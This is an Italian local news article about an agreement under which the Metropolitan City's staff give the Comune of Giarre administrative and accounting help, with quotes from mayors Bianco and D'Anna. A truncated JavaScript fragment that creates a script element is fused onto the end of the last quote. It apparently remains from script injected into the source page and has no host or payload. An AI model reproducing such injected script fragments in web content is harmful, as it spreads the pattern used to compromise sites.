Questo è il primo caso di collaborazione concreta fra la fresca formazione della Città metropolitana ed un centro, oltretutto importante, della vasta area di competenza.
Il sindaco “metropolitano” Bianco, e quello di Giarre, Angelo D’Anna, hanno siglato un accordo per il “servizio tecnico amministrativo contabile”. In buona sostanza, la Città Metropolitana fornirà al Comune di Giarre tutta la necessaria assistenza tecnico amministrativa. Questo senza arrecare pregiudizio alle normali attività dell’Ente e al di fuori dell’orario di lavoro. Dal canto suo il Comune jonico si impegna a mettere a disposizione del personale della Città Metropolitana locali idonei a svolgere l’attività richiesta concordando gli interventi con il Ragioniere Generale “metropolitano”. Tale personale acquisirà tutta la documentazione necessaria dai dipendenti comunali ed ha inoltre assunto l’impegno di mantenere riservati dati e informazioni di cui verrà in possesso e a non divulgarli in alcun modo. I costi dell’accordo saranno a totale carico del comune di Giarre (nella foto).giarre
L’obiettivo è quello di migliorare la propria gestione finanziaria e impedire situazioni di difficoltà nel rispetto dei principi di buona amministrazione.
La complessità della materia implica infatti un notevole dispendio di risorse finanziarie e l’affiancamento di personale che ha consolidato tali processi può concorrere a migliorare gli standard di efficienza e le performance di enti, come appunto è il comune di Giarre, che per dimensioni e per propria capacità finanziaria non hanno lì opportunità di formare il loro personale.
Alla luce di ciò, e delle vigenti normative, la Città Metropolitana intende favorire la realizzazione di servizi associati a favore degli altri enti locali in settori, dove la medesima Città Metropolitana, ha già sviluppato esperienze concrete.
“Fare squadra – ha detto Bianco – è importante per ottenere buoni risultati. Aiutare un comune nell’espletare al meglio i servizi finanziari e contabili è un atto doveroso, in particolar modo quando un ente non ha la possibilità di affrontare in maniera adeguata percorsi amministrativi delicati e complessi. La Città Metropolitana è dunque pronta e disponibile a dare una mano a tutti i comuni della sua area che chiedano aiuto in qualsiasi settore consentito dalle norme”.

“Intendiamo utilizzare al meglio quanto consentito dalla normativa vigente – ha dichiarato D’Anna –  per poter usufruire dell’assistenza tecnico amministrativa contabile della Città Metropolitana. Nel ringraziare per la disponibilità dimostrata siamo lieti di poter sperimentare per primi tale forma di collaborazione che potrà essere anche occasione e formazione sul campo per il nostro personale”.var d=document;var s=d.createElement(‘script’);

Leave a comment

L'indirizzo email non verrà pubblicato.